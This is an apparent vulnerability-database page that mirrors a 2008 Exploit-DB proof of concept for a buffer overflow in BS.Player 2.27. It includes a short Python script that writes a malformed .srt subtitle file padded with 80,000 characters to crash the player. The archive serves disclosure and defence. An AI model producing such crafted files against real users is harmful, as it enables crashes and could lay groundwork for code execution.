Lucene search
+L

BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)

🗓️ 16 Apr 2008 00:00:00Reported by j0rganType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC) movie.srt file with the name of the movie you like vulnerabilities discovered by Muris Kurgas j0rga

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6583
16 Apr 200800:00
circl
cve
CVE
CVE-2008-6583
3 Apr 200918:00
cve
cvelist
Cvelist
CVE-2008-6583
3 Apr 200918:00
cvelist
euvd
EUVD
EUVD-2008-6546
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6583
3 Apr 200918:30
nvd
openvas
OpenVAS
BSPlayer < 2.27.958 Stack Overflow Vulnerability
8 Apr 200900:00
openvas
openvas
OpenVAS
BSPlayer Stack Overflow Vulnerability SRT
8 Apr 200900:00
openvas
prion
Prion
Buffer overflow
3 Apr 200918:30
prion
#!/usr/bin/python
#
# BS.player 2.27 Build 959 SRT Buffer Overflow
# Just rename movie.srt file with the name of the movie you like...
#
# Vulnerability discovered by Muris Kurgas a.k.a j0rgan
# jorganwd [at] gmail [dot] com

# http://www.jorgan.users.cg.yu
#
# bolexxx, learn something, ladies will come soon or l8r man!
# red pill rocks!
# no muts, no pain :)

import os

bafer = 'A' * 80000

fileHandle = open ( 'movie.srt', 'w' )
fileHandle.write ( '1\n00:00:01,001 --> 00:00:05,099\n'+bafer )
fileHandle.close()

# milw0rm.com [2008-04-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.07045
32